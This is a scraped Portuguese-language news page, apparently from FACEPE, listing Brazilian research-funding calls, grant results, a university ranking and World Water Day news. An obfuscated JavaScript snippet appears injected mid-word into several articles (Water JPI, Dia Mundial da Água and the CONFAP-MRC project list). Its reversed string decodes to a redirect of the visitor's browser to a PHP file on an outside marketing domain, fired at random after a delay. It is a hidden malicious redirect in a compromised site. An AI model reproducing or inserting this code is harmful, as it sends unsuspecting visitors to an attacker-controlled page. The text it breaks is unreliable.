Fundação Boticário está com inscrições abertas para o edital que selecionará projetos de conservação da natureza em todo País

Boticário

Inscrições abertas: edital seleciona projetos de conservação da natureza em todo País

Até 31 de março, a Fundação Grupo Boticário recebe inscrições de propostas para a conservação da natureza. Juntas, iniciativas selecionadas terão o apoio de cerca de R$ 2 milhões

Estão abertas as inscrições para o 57º Edital da Fundação Grupo Boticário – Novas Ideias para a Conservação da Natureza. Pesquisadores de todo o Brasil podem inscrever iniciativas ligadas à conservação da biodiversidade até o dia 31 de março, pelo site da instituição.

Diferentemente dos anos anteriores, que tiveram uma chamada em cada semestre, 2019 concentrará as inscrições em uma só oportunidade, uma novidade que exige atenção dos interessados. Os projetos selecionados terão, somados, o apoio de cerca de R$ 2 milhões.

Os trabalhos devem contemplar ao menos uma das áreas abaixo:

Unidades de conservação de proteção integral e Reservas Particulares do Patrimônio Natural (RPPNs):propostas que contemplem a criação ou a ampliação de unidades de conservação em áreas continentais ou marinhas. Serão priorizados projetos que se tornem referência em gestão, uso público, pesquisa e que tragam benefícios para as comunidades do entorno.

Espécies ameaçadas: iniciativas que promovam a conservação de espécies nativas ameaçadas e que tenham impacto positivo em seu status de ameaça.

Ambientes marinhos: projetos que façam conexões entre diferentes atores-chave envolvidos em áreas marinhas protegidas, proteção de espécies ameaçadas e fortalecimento de instrumentos de proteção da biodiversidade marinha diante de pressões como sobrepesca, turismo predatório e exploração inadequada de recursos naturais.

Inovações e novas tecnologias para a conservação da natureza: serão selecionadas iniciativas que proponham novas formas de monitoramento da biodiversidade e o desenvolvimento de dispositivos que contribuam para a conservação de espécies e ecossistemas.

Os projetos inscritos devem estar vinculados a instituições sem fins lucrativos, como fundações de universidades, organizações não governamentais (ONGs) e associações. Dúvidas podem ser encaminhadas por e-mail para edital@fundacaogrupoboticario.org.br.

28 anos de apoio à conservação da natureza

Desde 1991, quando o primeiro edital da Fundação Grupo Boticário foi aberto, 1.563 iniciativas foram apoiadas em todo País, somando um investimento de cerca de R$ 80 milhões. Em 2019, a instituição continua apoiando propostas que visam a conservação da biodiversidade, focando em áreas que merecem atenção redobrada.

“Nosso foco reforça o comprometimento com a conservação, seja em ambientes continentais ou marinhos, em todos os biomas. Porém, os oceanos estão cada vez mais em evidência. Os Objetivos do Desenvolvimento Sustentável da ONU são muito baseados na qualidade de vida que vem dos mares e parte das mudanças climáticas também passa pela conservação dos oceanos. Por isso, destacamos os ambientes marinhos em nossos editais. Também queremos promover a integração das diferentes áreas do conhecimento, unindo esforços em prol da conservação”, afirma o coordenador de Ciência e Conservação da Fundação Grupo Boticário de Proteção à Natureza, Robson Capretz.

Sobre a Fundação Grupo Boticário

A Fundação Grupo Boticário é fruto da inspiração de Miguel Krigsner, fundador de O Boticário e atual presidente do Conselho de Administração do Grupo Boticário. A instituição foi criada em 1990, dois anos antes da Rio-92 ou Cúpula da Terra, evento que foi um marco para a conservação ambiental mundial. A Fundação Grupo Boticário apoia ações de conservação da natureza em todo o Brasil, totalizando mais de 1.500 iniciativas apoiadas financeiramente. Protege 11 mil hectares de Mata Atlântica e Cerrado, por meio da criação e manutenção de duas reservas naturais. Atua para que a conservação da biodiversidade seja priorizada nos negócios e nas políticas públicas, além de contribuir para que a natureza sirva de inspiração ou seja parte da solução para diversos problemas da sociedade. Também promove ações de mobilização, sensibilização e comunicação inovadoras, que aproximam a natureza do cotidiano das pessoas.

MAIS INFORMAÇÕES / AGENDAMENTO DE ENTREVISTAS
41 3026-2610 / 41 99684-9880 / 41 99135-9541 / 41 99196-7701
centralpress@centralpress.inf.br
www.centralpress.com.br

FACEPE divulga o resultado final do Edital 12/2018 – ZIKA – Inovação

zika inovação

A Fundação de Amparo à Ciência e Tecnologia do Estado de Pernambuco (FACEPE) divulga o resultado final do Edital 12/2018 – ZIKA – Inovação e informa que não houve proposta aprovada para este edital.

Propostas não enquadradas, receberão correspondência eletrônica e os recursos administrativos ao resultado poderão ser interpostos no prazo de dez dias contados do envio desta correspondência, por meio do formulário eletrônico específico disponível no perfil do coordenador no sistema AgilFAP (https://agil.facepe.br/).

Clique aqui e confira o resultado.

FACEPE participa de chamada para a vinda de pesquisadores britânicos ao Brasil

UK

A Fundação de Amparo à Ciência, Tecnologia e Inovação do Estado de Pernambuco (FACEPE), através do Conselho Nacional das Fundações Estaduais de Amparo à Pesquisa (Confap), e o Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) lançam a chamada The UK Academies 2018, realizada em conjunto com The Royal Society, The Academy of Medical Sciences e British Academy, no escopo do Fundo Newton. O objetivo é fomentar a vinda de pesquisadores britânicos para trabalhar em conjunto com pesquisadores brasileiros, no Brasil.

São elegíveis pesquisadores britânicos das áreas de ciências naturais, engenharia, ciências médicas, ciências sociais e humanidades. Os proponentes devem ser pesquisadores doutores a pelo menos dois anos e máximo de sete anos (young researchers) ou acima de sete anos (senior researchers). Para participar é preciso haver um pesquisador doutor colaborador no Brasil, vinculado a uma Instituição de Ensino Superior (IES) no Estado, como co-proponente (host researcher).

O fomento da FACEPE se dará por meio do: Research Mobility Grants (missões de 15 dias a até 3 meses), através dos seguintes itens financiáveis: passagens, diárias e seguro-saúde no valor total de R$ 30.000,00 (trinta mil reais) por proposta. A FACEPE irá financiar apenas 1 (uma) proposta. O proponente deve verificar os valores de diárias disponíveis em https://agil.facepe.br/tabelas.php.

As propostas deverão ser enviadas até o dia 25 de março de 2019 por meio do endereço https://sigconfap.ledes.net/ e também diretamente para a FACEPE, através dos seguintes passos:

  • Acessar o AgilFAP com seu login e senha (https://agil.facepe.br/);
  • Escolher, na aba Formulários, o item “Bolsas e Auxílios”;
  • Indicar, na aba Auxílios, a modalidade “APQ – Projeto de Pesquisa”;
  • Selecionar, em Natureza da solicitação, a opção “Editais” e, em Editais vigentes, a opção “Edital 26/2018 – UK Academies”.

No formulário online no AgilFAP deve ser incluído o plano de trabalho. O proponente deve manter o seu CV Lattes atualizado. Não serão aceitas propostas que submeterem a apenas uma plataforma, é obrigatória a submissão nas duas plataformas.

Acesse aqui a chamada.

Para maiores informações sobre a chamada na FACEPE, por favor entrar em contato com a gestora do programa, Neildes Vieira Paiva, através do e-mail: neildes.paiva@facepe.br

Acesse aqui informações da chamada no site do CONFAP.

A UFPE está entre as 20 universidades brasileiras que estão listadas entre as melhores do mundo

faculdadesVinte universidades brasileiras, todas elas públicas, estão na mais recente lista divulgada pelo Center for World University Rankings (CWUR) com as mil melhores instituições de ensino superior do mundo. Das 20, 19 melhoram seus resultados, na comparação com a última edição.

Para ranquear as universidades, são levados em conta sete aspectos:

1. qualidade de ensino (15% da nota): medida pelo número de ex-alunos que que ganharam prêmios internacionais, medalhas, proporcionalmente ao tamanho do corpo discente.
2. Empregabilidade dos ex-alunos (15%) medida pelo número de ex-alunos que chegaram ao posto de CEOs das maiores empresas do mundo, proporcionalmente ao tamanho do corpo discente.
3. Qualidade do corpo discente (15%): medida pela quantidade de professor que ganharam prêmios internacionais, medalhas, proporcionalmente ao tamanho do corpo docente.
4. Número de pesquisas divulgadas (15% da nota): relativo ao total de pesquisas divulgadas pela universidade.
5. Qualidade das publicações (15% da nota): medida em número de pesquisas publicadas na mídia especializada.
6. Influência (15% da nota): medida pelo número de pesquisas que aparecem em veículos de grande influência
7.Citações (10% da nota): medida pelo número de vezes que as pesquisas da universidade são citadas como embasamento de artigos e trabalhos.

A melhor pontuação entre as brasileiras é da USP, que é a 77ª melhor universidade do mundo, segundo CWUR. Na lista global, Harvard ficou em primeiro lugar, Stanford em segundo e o Massachusetts Institute of Technology  (MIT) em terceiro, exatamente as mesmas posições do ano passado.

A seguir, confira a lista completa de universidades brasileiras no ranking:

Posição no ranking nacional Instituição de ensino Posição no ranking mundial Pontuação
1 Universidade de São Paulo 77 82,6
2 Universidade Federal do Rio de Janeiro 298 76,4
3 Universidade Estadual de Campinas (Unicamp) 360 75,5
4 Universidade Estadual Julio de Mesquita Filho (Unesp) 372 75,3
5 Universidade Federal do Rio Grande do Sul 398 75
6 Universidade Federal de Minas Gerais 406 74,9
7 Universidade Federal de São Paulo (Unifesp) 442 74,4
8 Universidade Estadual do Rio de Janeiro (Uerj) 659 72,2
9 Universidade Federal de Santa Catarina 694 71,9
10 Universidade Federal do Paraná 709 71,8
11 Universidade de Brasília (UnB) 737 71,6
12 Universidade Federal de Viçosa 739 71,6
13 Universidade Federal do Ceará 814 71
14 Universidade Federal de Pernambuco 840 70,8
15 Universidade Federal de São Carlos 847 70,8
16 Universidade Federal de Pelotas 886 70,5
17 Universidade Federal Fluminense 889 70,5
18 Universidade Federal de Goiás 892 70,5
19 Universidade Federal de Santa Maria 927 70,2
20 Universidade Federal da Bahia 985 69,9

Fonte: Revista Exame

FACEPE divulga seu Relatório dos Indicadores de Resultados

Indicadores FACEPE

A FACEPE acaba de disponibilizar seu Relatório dos Indicadores de Resultados, dados apurados de seus principais programas até o ano de 2017.

Os indicadores propostos buscam medir os resultados a partir dos objetivos estratégicos de resultados e o desdobramento das suas iniciativas estratégicas. Além destes indicadores, para complementar a análise serão apresentadas informações sobre os egressos. O detalhamento dos indicadores está anexo a este documento.

OBJETIVO ESTRATÉGICO

INICIATIVA ESTRATÉGICA

INDICADOR

Ampliar o apoio a estudos e pesquisas em CT&I com foco em temas prioritários para o estado

Apoiar editais transversais e por área de conhecimento de projetos de pesquisa científica

Valor investido por área de conhecimento

N° de editais lançados por ano

Aumentar a oferta de editais temáticos em apoio às secretarias estaduais

N° de editais temáticos em apoio às Instituições do Estado

Apoiar à formação de capital humano de alto nível

Apoiar as atividades de pesquisa e formação de recursos humanos através de auxílios

% dos Recursos Estaduais Investidos em Auxílios e Bolsas

Apoiar projetos de iniciação científica e extensão para alunos de graduação

Índice de conclusão de BIA

Índice de atendimento de bolsa BIC

Índice de conclusão de BIC

Apoiar a formação de mestres e doutores

Índice de atendimento das bolsas de mestrado

Índice de conclusão de bolsa de mestrado

Índice de atendimento das bolsas de doutorado

Índice de conclusão de bolsa de doutorado

Melhorar os programas de apoio à atração e fixação de pesquisadores

Evolução do número de bolsas de fixação em PE

Aumentar o atendimento à demanda das empresas por estudos e pesquisas geradores de inovação

Estimular o programa de apoio a parcerias entre empresas e ICTS para inovação tecnológica e formação qualificada – PITEC

Índice de atendimento do PITEC

Promover o Programa Pesquisador na Empresa de Pernambuco – PEPE

Índice de atendimento do PEPE

Aprimorar a subvenção econômica à inovação

Índice de atendimento dos programas de subvenção econômica

Aumentar as ações de cooperação internacional e interiorização

Estimular a cooperação internacional

N° de editais internacionais lançados

Índice de atendimento a demanda da cooperação internacional

Promover a interiorização dos programas da FACEPE

Índice de Interiorização

Acesse o Relatório completo.

FACEPE divulga resultado preliminar do PAPPE Integração 8ª Rodada

pappe-integração-fapesb-640x353

FACEPE divulga resultado preliminar do PAPPE Integração 8ª Rodada

Foram aprovadas 11 propostas para apoio financeiro no edital 05/2018 do Programa de Apoio à Pesquisa, Desenvolvimento e Inovação em Microempresas e Empresas de Pequeno Porte na Modalidade Subvenção Econômica – PAPPE Integração – 8ª Rodada – totalizando R$ 3,88 milhões.

A aprovação final ficará condicionada a análise econômico-financeira, a visita técnica a ser realizada pela equipe técnica da FACEPE e pelo comitê técnico e a entrega da documentação descrita no anexo II, do regulamento do edital, até o dia 28 de setembro de 2018.

Os coordenadores das propostas não recomendadas receberão correspondência eletrônica com a justificativa. Recursos administrativos ao resultado poderão ser interpostos no prazo de dez dias contados do envio da correspondência eletrônica, por meio do formulário eletrônico específico disponível no perfil do coordenador no sistema AgilFAP (http://agil.facepe.br/).

Clique aqui e confira o resultado.

FACEPE divulga o Resultado Parcial do Edital 27/2017 Water JPI 2017

water

A Fundação de Amparo à Ciência e Tecnologia do Estado de Pernambuco – FACEPE – divulga as pré-propostas selecionadas para a segunda fase desta chamada. Os coordenadores listados no Resultado Parcial devem submeter as propostas detalhadas até 27 de junho de 2018, tanto na plataforma internacional como no sistema AgilFAP da FACEPE, através dos seguintes passos:

  • Acessar o AgilFAP com seu login e senha (http://agil.facepe.br/);
  • Escolher, na aba Formulários, o item “Bolsas e Auxílios”;
  • Indicar, na aba Auxílios, a modalidade “APQ – Projeto de Pesquisa”;
  • Selecionar, em Natureza da solicitação, a opção “Editais” e, em Editais vigentes, a opção “Edital 27/2017 – Water JPI 2017”.

Esta chamada tem o objetivo de apoiar projetos colaborativos e transnacionais de pesquisa, desenvolvimento e inovação, que abordem questões relacionadas aos desafios da água a serem enfrentados pela sociedade, vis$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando o gerenciamento de recursos hídricos em apoio aos Objetivos do Desenvolvimento Sustentável das Nações Unidas.

Baixe aqui o resultado parcial.

22 de Março – Dia Mundial da Água

água facepeEm 2050 cerca de 5 bilhões de pessoas estarão vivendo com pouco acesso à água, alerta Unesco; ABDI incentiva projetos de gestão e uso eficiente no Brasil

A falta de água já é uma realidade em diversas partes do mundo. Segundo dados do governo brasileiro, cerca de 900 municípios do país estão em situação de seca. Gr$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andes centros também enfrentam o problema, como é o caso de Brasília (DF), onde a população convive com racionamento. A Agência Brasileira de Desenvolvimento Industrial (ABDI) aponta que uma das saídas para a crise hídrica é o investimento em tecnologias para tornar as cidades inteligentes.

“Um passo importante para evitar o desperdício é, sem dúvida, tornar nossas cidades inteligentes. Apenas com a ajuda da tecnologia, já é possível garantir uma economia de pelo menos 30% a 40% de água”, afirma Guto Ferreira, presidente da ABDI. “O apontamento da Unesco é extremamente grave. A solução depende de cada um e passa pelos municípios. Existem tecnologias como hidrômetros inteligentes, sensores em tubulações com monitoramento em tempo real, por exemplo, que ajudam a evitar o desperdício”, aponta Ferreira.

Em uma cidade com 1 milhão de habitantes o consumo total médio em um ano é de seis milhões de metros cúbicos de água. Com uma economia de 30%, seriam poupados 1,8 milhão de litros de água. “Essa quantidade poderia abastecer uma cidade como a capital do Espírito Santo por praticamente um ano inteiro”, estima o presidente da ABDI. “A questão primordial é tornar as cidades brasileiras inteligentes do ponto de vista da água, do saneamento básico, da gestão dos resíduos sólidos e também quanto à eficiência energética. Sem isso, aliado à conscientização de cada um, não há saída”, adverte Ferreira.

Fórum Mundial da Água

A Agência Nacional de Águas (ANA) preparou uma página especial para você acompanhar o que acontece no 8º Fórum Mundial da Água. Clique aqui e fique por dentro do maior evento sobre água do mundo. 

Com o apoio da ANA e de outros parceiros, o Fórum chega pela primeira vez no hemisfério Sul, trazendo a temática ‘Compartilh$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Água’.

O evento oportuniza um diálogo mundial, aberto e democrático, para estabelecer compromissos políticos relacionados à água. Também incentiva o uso racional, conservação, proteção, planejamento e gestão deste recurso em todos os setores da sociedade.

Durante o 8º Fórum Mundial da Água, os participantes poderão participar de atividades e discussões sobre o tema em diversas vertentes, tais como água e energia, economia, alimentos, cidades e ecossistemas, debates políticos entre autoridades governamentais e parlamentares, grupo focal de sustentabilidade; e interagir no Fórum Cidadão, uma plataforma para incentivar a participação efetiva da sociedade civil, além de exposição e feira.

O evento acontece de 17 a 23 de março de 2018, no Centro de Convenções Ulisses Guimarães e no Estádio Nacional Mané Garrincha. Para mais informações, acesse o site do evento.

Duas das oito propostas aprovadas na chamada CONFAP-MRC têm pesquisadores pernambucanos

MRC

Das 8 (oito) propostas avaliadas na chamada CONFAP-MRC: Health Systems Research Networks são de grupos que tem a participação de pesquisadores pernambucanos.

Eis os projetos que contam com a participação de Pernambuco:

Título do Projeto

Nomes e instituições dos PIs no Brasil

FAPs

Nomes e instituições dos PIs no Reino Unido

1 Strengthening the inclusion of people with disabilities in the health system in Brazil Prof. Tereza Maciel Lyra (FIOCRUZ/PE), Prof. Christina May Moran de Brito (USP), $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Prof. Luciana Sepulveda Koptcke (FIOCRUZ/DF) FACEPE, FAPESP, $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and FAPDF Profa. Hannah Kuper (London School of Hygiene & Tropical Medicine)
2 Unpacking the effect of the national pay for performance scheme (PMAQ) on inequalities in the financing $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and delivery of primary care in Brazil Prof. Everton Nunes da Silva (UnB), Prof. Garibaldi Dantas Gurgel Júnior (FIOCRUZ/PE), $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Prof. Luciano Bezerra Gomes  (UFPB) FAPDF, FACEPE, $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and FAPESQ Profa. Josephine Borghi (London School of Hygiene & Tropical Medicine)

Acesse aqui o resultado final.